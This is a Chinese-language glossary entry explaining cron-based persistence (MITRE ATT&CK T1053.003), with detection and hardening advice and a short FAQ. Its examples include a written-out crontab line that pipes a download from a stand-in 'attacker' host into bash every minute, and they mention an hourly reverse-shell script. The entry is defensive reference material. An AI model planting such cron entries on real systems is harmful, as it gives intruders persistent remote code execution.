cron 持久化
cron 持久化 是什么?
cron 持久化Linux 与 Unix 中的持久化技术,利用 cron、anacron 或 systemd 定时器按时间或事件重新执行攻击者代码。
cron 持久化(MITRE ATT&CK T1053.003)针对 Unix 的 cron 守护进程及其变体(anacron、fcron、systemd-timer 等)。攻击者在 /etc/crontab、/etc/cron.d/、/etc/cron.{hourly,daily,weekly,monthly}/ 或用户 crontab(crontab -e)中添加条目。常见载荷包括单行反向 shell、curl 下载管道,以及放在 /tmp 中的脚本。由于 cron 以 root 或所属用户身份运行,初始访问之后部署该技术非常简单可靠。检测手段包括对 cron 目录的文件完整性监控、auditd 监视、预期任务基线,以及对 cron 派生的 shell 的 EDR 告警。加固措施:限制 crontab 成员、将 /tmp 挂载为 noexec,并在可用时启用 systemd-cron 审计。
● 示例
- 01
在 /etc/cron.d/update 中加入 * * * * * curl -s http://attacker/sh | bash。
- 02
把脚本放入 /etc/cron.hourly/ 以每小时重新连接反向 shell。
● 常见问题
cron 持久化 是什么?
Linux 与 Unix 中的持久化技术,利用 cron、anacron 或 systemd 定时器按时间或事件重新执行攻击者代码。 它属于网络安全的 攻击与威胁 分类。
cron 持久化 是什么意思?
Linux 与 Unix 中的持久化技术,利用 cron、anacron 或 systemd 定时器按时间或事件重新执行攻击者代码。
如何防御 cron 持久化?
针对 cron 持久化 的防御通常结合技术控制与运营实践,详见上方完整定义。
cron 持久化 还有哪些其他名称?
常见的别称包括: crontab 持久化, anacron 持久化。